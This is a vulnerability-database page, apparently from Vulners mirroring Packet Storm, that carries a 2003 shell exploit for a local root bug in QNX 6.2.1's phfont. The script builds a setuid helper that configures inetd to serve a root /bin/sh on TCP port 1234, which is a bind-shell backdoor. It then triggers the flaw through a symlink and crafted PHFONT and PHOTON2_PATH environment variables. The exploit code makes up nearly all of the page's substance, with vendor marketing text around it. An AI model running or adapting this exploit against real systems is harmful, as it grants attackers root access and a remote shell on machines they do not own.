Lucene search
K

DSR-QNX6.2.1-phfont.sh.txt

🗓️ 10 Feb 2006 00:00:00Reported by Knud Erik HojgaardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Word exploit for QNX 6.2.1, targeting phfont vulnerabilit

Code
`#!/bin/sh  
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383  
# greetings and salutations from www.lort.dk  
# kokanin@dtors 18/10/2003  
# $ cksum /usr/photon/bin/phfont  
# 4123428723 30896 /usr/photon/bin/phfont  
# $ uname -a  
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86   
cat > phfontphf.c << __EOF__  
int main(){  
setuid(0);  
system("echo 1234 stream tcp nowait root /bin/sh sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");  
}   
__EOF__  
make phfontphf >/dev/null  
ln -s /usr/photon/bin/phfont ./phfont  
export PHFONT=hello  
export PHOTON2_PATH=mom  
./phfont  
rm phfont*  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
23